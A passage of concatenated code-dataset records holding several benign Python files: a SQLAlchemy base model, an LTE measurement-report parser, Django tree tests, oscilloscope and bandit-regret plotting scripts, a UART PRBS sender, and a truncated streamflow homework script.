primary_key=True)\n    create_at = db.Column(db.DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))\n    updated_at = db.Column(db.DateTime(timezone=True), nullable=True)\n\n    def before_save(self, *args, **kwargs):\n        return\n\n    def after_save(self, *args, **kwargs):\n        return\n\n    def save(self, commit=True):\n        self.before_save()\n\n        db.session.add(self)\n        if commit:\n            try:\n                db.session.commit()\n            except Exception as error:\n                db.session.rollback()\n                raise error\n\n        self.after_save()\n\n    def delete(self, commit=True):\n        db.session.delete(self)\n        if commit:\n            db.session.commit()\n", "sub_path": "app/models/bases_model.py", "file_name": "bases_model.py", "file_ext": "py", "file_size_in_byte": 933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "app.configs.database.SingletonSQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "495205823", "text": "from lxml import etree\nimport dateutil.parser\nfrom pandas import DataFrame, Series\nimport pandas as pd\nfrom functools import reduce\nimport json\nimport pymongo\nfrom pymongo import MongoClient\n\nclass MroReader:\n    def __init__(self, afilter, **kwargs):\n        super().__init__(**kwargs)\n        self.item_dicts=[]\n        self.afilter=afilter\n\n    def display(self):\n        for item_dict in self.item_dicts:\n            print(item_dict)\n\n    def read(self, item_measurement, item_id):\n        for item_element in item_measurement:\n            if item_element.tag == 'smr':\n                item_key = item_element.text.replace('MR.', '').split(' ')\n            else:\n                centerFilled=False\n                item_dict = {}\n                neighbor_list=[]\n                for item_v in item_element:\n                    item_value = item_v.text.replace('NIL', '-1').split(' ')\n                    _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n                    _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n                    if _item_sub_dict['LteNcPci']>=0:\n                        _neighbor={}\n                        _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n                        _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n                        neighbor_list.append(_neighbor)\n                    else:\n                        break\n                if not centerFilled:\n                    item_dict.update(item_element.attrib)\n                    item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n                    item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n                    item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n                    item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n                    centerFilled=True\n                if len(neighbor_list)>0:\n                    item_dict.update({'NeighborList': neighbor_list})\n                self.item_dicts.append(item_dict)\n\n    def read_zte(self, item_measurement, item_id):\n        for item_element in item_measurement:\n            if item_element.tag == 'smr':\n                item_key = item_element.text.replace('MR.', '').split(' ')\n                if 'LteScEarfcn' not in item_key:\n                    return\n            else:\n                centerFilled=False\n                item_dict = {}\n                neighbor_list=[]\n                for item_v in item_element:\n                    item_value = item_v.text.replace('NIL', '-1').split(' ')\n                    _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n                    _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n                    if _item_sub_dict['LteNcPci']>=0:\n                        _neighbor={}\n                        _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n                        _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n                        
neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update({'id': item_id+'-'+item_element.attrib['MR.objectId']})\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def _filter_by_neighbor_len(self, length):\n return list(filter(lambda x: True if len(x['NeighborList'])==length else False, self.item_dicts))\n\n def _map_neighbor_rsrp_diff(self, index):\n measureList=self._filter_by_neighbor_len(index)\n if len(measureList)==0:\n return []\n return list(map(lambda item: {\n 'CellId': item['id'],\n 'NeighborPci': item['NeighborList'][index-1]['Pci'],\n 'RsrpDiff': item['Rsrp']-item['NeighborList'][index-1]['Rsrp'],\n 'Rsrp': item['Rsrp'],\n 'Pci': item['Pci'],\n 'Ta': item['Ta'],\n 'SinrUl': item['SinrUl']\n }, measureList))\n\n def map_rsrp_diff(self):\n diff_list=list(map(lambda index: self._map_neighbor_rsrp_diff(index+1), list(range(6))))\n combined_list=reduce(lambda first,second: first+second,diff_list,[])\n if len(combined_list)==0:\n return []\n stat_list=list(map(lambda item: {\n 'CellId': item['CellId'],\n 'NeighborPci': item['NeighborPci'],\n 'Pci': item['Pci'],\n 'Diff0': 1 if item['RsrpDiff']<=0 else 0,\n 'Diff3': 1 if item['RsrpDiff']<=3 and item['RsrpDiff']>0 else 0,\n 'Diff6': 1 if item['RsrpDiff']<=6 and item['RsrpDiff']>3 else 0,\n 'Diff9': 1 if item['RsrpDiff']<=9 and item['RsrpDiff']>6 else 0,\n 'Diff12': 1 if item['RsrpDiff']<=12 and item['RsrpDiff']>9 else 0,\n 'DiffLarge': 1 if item['RsrpDiff']>12 else 0,\n 'RsrpBelow120': 1 if item['Rsrp']<20 else 0,\n 'RsrpBetween120110': 1 if item['Rsrp']<30 and item['Rsrp']>=20 else 0,\n 'RsrpBetween110105': 1 if item['Rsrp']<35 and item['Rsrp']>=30 else 0,\n 'RsrpBetween105100': 1 if item['Rsrp']<40 and item['Rsrp']>=35 else 0,\n 'RsrpBetween10090': 1 if item['Rsrp']<50 and item['Rsrp']>=40 else 0,\n 'RsrpAbove90': 1 if item['Rsrp']>=50 else 0,\n 'Ta0or1': 1 if item['Ta']==0 or item['Ta']==1 else 0,\n 'Ta2or3': 1 if item['Ta']==2 or item['Ta']==3 else 0,\n 'Ta4or5': 1 if item['Ta']==4 or item['Ta']==5 else 0,\n 'Ta6or7': 1 if item['Ta']==6 or item['Ta']==7 else 0,\n 'Ta8or9': 1 if item['Ta']==8 or item['Ta']==9 else 0,\n 'Ta10to12': 1 if item['Ta']>=10 and item['Ta']<=12 else 0,\n 'Ta13to15': 1 if item['Ta']>=13 and item['Ta']<=15 else 0,\n 'Ta16to19': 1 if item['Ta']>=16 and item['Ta']<=19 else 0,\n 'Ta20to24': 1 if item['Ta']>=20 and item['Ta']<=24 else 0,\n 'Ta25to29': 1 if item['Ta']>=25 and item['Ta']<=29 else 0,\n 'Ta30to39': 1 if item['Ta']>=30 and item['Ta']<=39 else 0,\n 'TaAbove40': 1 if item['Ta']>=40 else 0,\n 'SinrUl0to9': 1 if item['SinrUl']>=0 and item['SinrUl']<=9 else 0,\n 'SinrUl10to19': 1 if item['SinrUl']>=10 and item['SinrUl']<=19 else 0,\n 'SinrUl20to24': 1 if item['SinrUl']>=20 and item['SinrUl']<=24 else 0,\n 'SinrUl25to29': 1 if item['SinrUl']>=25 and item['SinrUl']<=29 else 0,\n 'SinrUl30to34': 1 if item['SinrUl']>=30 and item['SinrUl']<=34 else 0,\n 'SinrUlAbove35': 1 if item['SinrUl']>=35 else 0\n }, combined_list))\n df = DataFrame(stat_list)\n stat=df.groupby(['CellId','Pci','NeighborPci']).sum().reset_index()\n return json.loads(stat.T.to_json()).values()\n\nclass MrsReader:\n def __init__(self, mrNames, startTime, date_dir, db, **kwargs):\n 
self.mrNames=mrNames\n self.startTime=startTime\n self.date_dir=date_dir\n self.db=db\n return super().__init__(**kwargs)\n\n def read(self, item_measurement):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': item_element.attrib['id']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)\n\n def read_zte(self, item_measurement, eNodebId):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': eNodebId+'-'+item_element.attrib['MR.objectId']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)", "sub_path": "Lte.Auxilary/mr/mr_service.py", "file_name": "mr_service.py", "file_ext": "py", "file_size_in_byte": 9319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "96215502", "text": "import re\nimport json\nimport pprint\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom assessment.tests import build_assessments_for_permissions_testing\nfrom utils.helper import HAWCDjangoJSONEncoder\n\nfrom .models import SummaryText\n\nclass SummaryTextTests(TestCase):\n def setUp(self):\n build_assessments_for_permissions_testing(self)\n\n @staticmethod\n def clean_json(json_dump):\n remove_fields = ['created', 'last_updated', 'slug', 'text', 'assessment']\n for node in json_dump:\n node.pop('id')\n for field in remove_fields:\n node['data'].pop(field)\n if node.get('children'):\n SummaryTextTests.clean_json(node['children'])\n\n\n def test_adding_texts(self):\n lvl_1a = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1a',\n slug='lvl_1a',\n text='text')\n\n lvl_1b = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1b',\n slug='lvl_1b',\n text='text')\n\n lvl_2a = SummaryText.add_summarytext(assessment=self.assessment_working,\n parent=[lvl_1a],\n title='lvl_2a',\n slug='lvl_2a',\n text='text')\n\n lvl_2b = SummaryText.add_summarytext(assessment=self.assessment_working,\n sibling=[lvl_2a],\n title='lvl_2b',\n slug='lvl_2b',\n text='text')\n\n assessment_root = SummaryText.get_assessment_root_node(self.assessment_working)\n\n tree_form = SummaryText.dump_bulk(assessment_root)\n # print pprint.pprint(tree_form)\n\n SummaryTextTests.clean_json(tree_form)\n 
self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n\n # Swap 2a and 2b\n lvl_2b.move_summarytext(parent=lvl_1a, sibling=None)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2b\"}}, {\"data\": {\"title\": \"lvl_2a\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n # Swap back\n lvl_2b.move_summarytext(parent=None, sibling=lvl_2a)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n", "sub_path": "project/summary/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "assessment.tests.build_assessments_for_permissions_testing", "line_number": 16, "usage_type": "call"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 30, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 30, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 35, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 35, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 40, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 40, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 46, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 46, "usage_type": "name"}, {"api_name": "models.SummaryText.get_assessment_root_node", "line_number": 52, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 52, "usage_type": "name"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 54, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 69, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "613704701", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 22 18:33:47 2019\n\n@author: user\n\"\"\"\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt #for displaying data\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport pandas as pd #to manage dataframe\nimport struct\nfrom math import sqrt\nimport os # file and path operrations\nimport 
time\nimport sys # get input arguments of the python program\n\n\n\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.offline.offline import _plot_html\n\nimport glob #listing of files\nimport json\n\ndata_path = r\"../out/*/\"\noutput_path = r\"../temp/\"\npng_resolution_dpi = 300\n\n\ndirectories = glob.glob(data_path)\nic_cycle_order = []\n\n\nsorted_directories = sorted(directories)#sorted( directories, key = lambda directory: os.path.getctime(directory)) #getmtime for modified time\nprint(sorted_directories)\n# # for directory in sorted_directories:\n    # # print(directory+'\\n')#print(\"{} - {}\".format(directory, time.ctime(os.path.getctime(directory))) )\n\nchannel = int(sys.argv[1]) \nprint('channel = \\n', channel)\nic_cycle = int(sys.argv[2]) \nprint('ic_cycle = \\n', ic_cycle)\nwb_cycle = int(sys.argv[3])\nprint('wb_cycle = \\n', wb_cycle)\nwb_sub_cycle = int(sys.argv[4])\nprint('wb_sub_cycle = \\n', wb_sub_cycle)\n\ntotal_ic_cycles = len(directories) # may add additional checks to avoid parasite folders added for testing\n# may also check json file to get metadata\n# manage the cases where user inputs exceed the limits ic and wb\n# total_wb_cycles = #get this from json file\n\n\n\nif ic_cycle > (total_ic_cycles - 1) :\n\tic_cycle = total_ic_cycles - 1 # this is to display the last data\n\n# confirm the data exist\n\nstream_filename = sorted_directories[ic_cycle] + \"ch_\" + str(channel) + \"_raw.dat\"\nprint(stream_filename)\n\nresult = sorted_directories[ic_cycle].find('IC_CYCLE') \nif result == -1:\n\tprint('Folder name incorrect \\n')\n\tsys.exit()\n\n\t\nwith open(sorted_directories[ic_cycle]+'cfg.json') as json_file: \n\tdata = json.load(json_file)\n\tsampling_period_ns = data['Oscilloscopes']['Picoscope 4444']['Sampling Period NS']\n\tresolution_bits = data['Oscilloscopes']['Picoscope 4444']['Sample Resolution bits']\n\tvoltage_range_str = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Voltage Range']\n\ttotal_samples_per_waveform = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveform Number of Samples']\t\n\twaveforms_per_wb_cycle = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms per WB Cycle']\t\n\t\n\trange_val, range_unit = voltage_range_str.split()\n\trange_val_mv = 0\n\tif range_unit == 'V':\n\t\trange_val_mv = 1000 * int(range_val)\n\telse:\n\t\trange_val_mv = int(range_val)\n\tprint ('range_mv =', range_val_mv)\t\t\t\n\t\n\t\nwith open(sorted_directories[ic_cycle]+'stat.json') as json_file: \n\tdata = json.load(json_file)\n\tcaptured_waveforms = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms found']\n\t\n\n\n\n\n# get the following data from json\nwb_cycle_total_samples = waveforms_per_wb_cycle * total_samples_per_waveform\ni = 0\nsample_offset = wb_cycle * wb_cycle_total_samples + wb_sub_cycle * total_samples_per_waveform\n\n\n\n\n\t\n\nexists = os.path.isfile(stream_filename)\nif exists:\n\t# Store configuration file values\n\ttest = 0\nelse:\n\t# Keep presets\n\tprint(\"ch1 file doesn't exist \\n\")\n\tsys.exit()\n\nfp_stream = open(stream_filename, \"rb\")\nfp_stream.seek(sample_offset * 2)\nstream1 = np.fromfile(fp_stream, dtype=([('channel', '<i2')]))\n\n# raw samples are signed 16-bit ADC counts; full scale maps to the channel range,\n# i.e. mV = counts * range_val_mv / maxADCValue;\ndata = np.float64(stream1['channel'])\ndata = data * range_val_mv / 32768\n\n\n\n\n# # Create a trace\ntrace = go.Scatter(\n    y = stream1['channel']\n)\nlayout = go.Layout(\n    
margin=dict(\n l=0,\n r=0,\n b=0,\n t=0,\n\t\tpad=4\n ),\n paper_bgcolor='#7f7f7f',\n plot_bgcolor='#c7c7c7'\t\n)\nfig = plt.figure()\nfig = go.Figure(data=[trace], layout=layout)\nplotly.offline.plot(fig, filename= output_path + 'ch_' + str(channel) + \".html\", auto_open=False)\n\n\n", "sub_path": "prg/picoscope_4444/python/process_raw_html.py", "file_name": "process_raw_html.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "json.load", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 128, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 128, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 143, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 143, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 144, "usage_type": "attribute"}]} +{"seq_id": "96900209", "text": "import logging\nimport serial\nimport time\n\n###################################################################################\n\n\nclass CommUART(object):\n def __init__(self, address):\n self.address = address\n self.sc = None\n\n def connect(self):\n logging.debug(\"Opening COM port : {0}\".format(self.address))\n self.sc = None\n while self.sc is None:\n try:\n self.sc = serial.Serial(port=self.address, baudrate=3000000, rtscts=False)\n except serial.serialutil.SerialException as se:\n if 'Device or resource busy:' in se.__str__():\n logging.info('Opening COM port is taking a little while, please stand by...')\n else:\n logging.error('se: {0}'.format(se))\n time.sleep(1)\n logging.debug(\"COM port open successfully.\")\n self.sc.flushInput()\n\n def disconnect(self):\n logging.debug(\"Closing COM port : {0}\".format(self.address))\n self.sc.close()\n\n def receivedPacket(self, length):\n if self.sc is None:\n raise Exception('COM port is not opened.')\n packet = b''\n received = 0\n while received < length:\n serialByte = self.sc.read(1)\n if serialByte is None:\n raise Exception('Bad character.')\n elif len(serialByte) == 0:\n break\n elif received < length:\n received += 1\n packet += serialByte\n return packet\n \n def 
send(self, data):\n self.sc.write(bytes([data]))\n\n def prbs8(self, curval):\n newbit = (((curval >> 6) ^ (curval >> 5)) & 1)\n return ((curval << 1) | newbit) & 0x7f\n###################################################################################\n\ndef main():\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s : %(message)s')\n\n #comm = CommUART(\"/dev/cu.usbserial-FT0NCE8B\")\n #comm = CommUART(\"/dev/cu.usbmodem143422\")\n comm = CommUART(\"/dev/cu.usbmodem143132\")\n comm.connect()\n\n curval = 0\n #packet = comm.receivedPacket(1)\n #curval = int.from_bytes(packet, byteorder = 'little')\n val = comm.prbs8(0xff)\n byteCount = 0\n dropcnt = 0\n deltatime = 0\n drop = False\n while True:\n try:\n comm.send(val)\n startTime = time.time()\n# packet = comm1.receivedPacket(1)\n endTime = time.time()\n deltatime += endTime - startTime\n # curval = int.from_bytes(packet, byteorder = 'little')\n # if curval != val:\n # dropcnt += 1\n val = comm.prbs8(val)\n byteCount += 1\n\n if deltatime > 0:\n bytesPerSec = byteCount / deltatime #(endTime - startTime)\n\n #print(\"Bytes : {0}\".format(bytes))\n #if drop:\n # print(\"Dropped.... Bytes/sec : {0}\".format(bytesPerSec))\n #else:\n if (byteCount & 0xff) == 0:\n print(\"Bytes/sec : %.2f, drop %d \" %(bytesPerSec, dropcnt))\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt. Exiting.\")\n break\n\n comm.disconnect()\n # comm1.disconnect()\n###################################################################################\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Python/uartprbs_tx.py", "file_name": "uartprbs_tx.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "533072377", "text": "import matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport matplotlib.ticker as ticker\r\n\r\n# result_file = \"../expt/results/task4_1.txt\"\r\nresult_file = \"finalT2.txt\"#\"outputDataT2.txt\"\r\ninstance_list = [\"../instances/i-1.txt\",\"../instances/i-2.txt\",\"../instances/i-3.txt\"]\r\n# instance_list = [\"i-1.txt\",\"i-2.txt\",\"i-3.txt\"]\r\nalgorithms = [\"thompson-sampling\", \"thompson-sampling\"]\r\nfinal_dict = {\"../instances/i-1.txt\":{}, \"../instances/i-2.txt\":{}, \"../instances/i-3.txt\":{}}\r\nhorizons = [100, 400, 1600, 6400, 25600, 102400]\r\n# final_dict = {\"i-3.txt\":{}, \"i-1.txt\":{}, \"i-2.txt\":{}}\r\nwith open(result_file,'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n x = line.rstrip().split(', ')\r\n if x[1] in final_dict[x[0]].keys():\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += 
float(x[5])/50.0\r\n else:\r\n final_dict[x[0]][x[1]] = [0]*6\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n\r\nfor i,instance in enumerate(instance_list):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.set_xscale('log')\r\n ax.xaxis.set_ticks(horizons)\r\n ax.get_xaxis().set_major_formatter(ticker.ScalarFormatter())\r\n ts = final_dict[instance][\"thompson-sampling\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling\")\r\n ts = final_dict[instance][\"thompson-sampling-with-hint\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling (with Hint)\")\r\n plt.xlabel(\"Horizon (Logarithmic Scale, Base 2)\")\r\n plt.ylabel(\"Average Regret\")\r\n plt.legend()\r\n\r\n pltTitle = instance.replace('../instances/', '')\r\n pltTitle = pltTitle.replace('.txt', '')\r\n pltTitle = pltTitle.replace('i-', 'Instance ')\r\n # plt.plot(x_axis,kl_ucb,x_axis,ts,x_axis,ucb,x_axis,eg)\r\n plt.title(\"{}\".format(pltTitle))\r\n plt.savefig(\"testT2_instance{}.png\".format(i+1))", "sub_path": "Assignment1/submission/PlotGenT2.py", "file_name": "PlotGenT2.py", "file_ext": "py", "file_size_in_byte": 1863, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log2", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "8280225", "text": "# Example solution for HW 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# filepath = '../Assignments/Solutions/data/streamflow_week1.txt'\n\n# %%\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] 
=data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# %%\n# Sorry no more helpers past here this week, you are on your own now :) \n# Hints - you will need the functions: describe, info, groupby, sort, head and tail.\n#%%\n# Esimation5\ndata.flow\n# print(data.datetime[(data.flow >= rnge[0]) & (data.flow <= rnge[1])])\n\n# list_2010 = []\n# list_2011 = []\n# list_2012 = []\n# list_2013 = []\n# list_2014 = []\n# list_2015 = []\n# list_2016 = []\n# list_2017 = []\n# list_2016 = []\n# list_2017 = []\n# list_2020 = []\n\n# data.flow[(data.year >= 2010) & (data.year <= 2020) & (data.month == i)].mean]\n#%%\n# 1, 3, 5, 7, 8, 10, 12\nfor d in range(2010, 2020):\n fig1 = plt.figure()\n fig1.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (1, 3, 5, 7, 8, 10, 12):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in month')\n plt.legend(['1', '3', '5', '7', 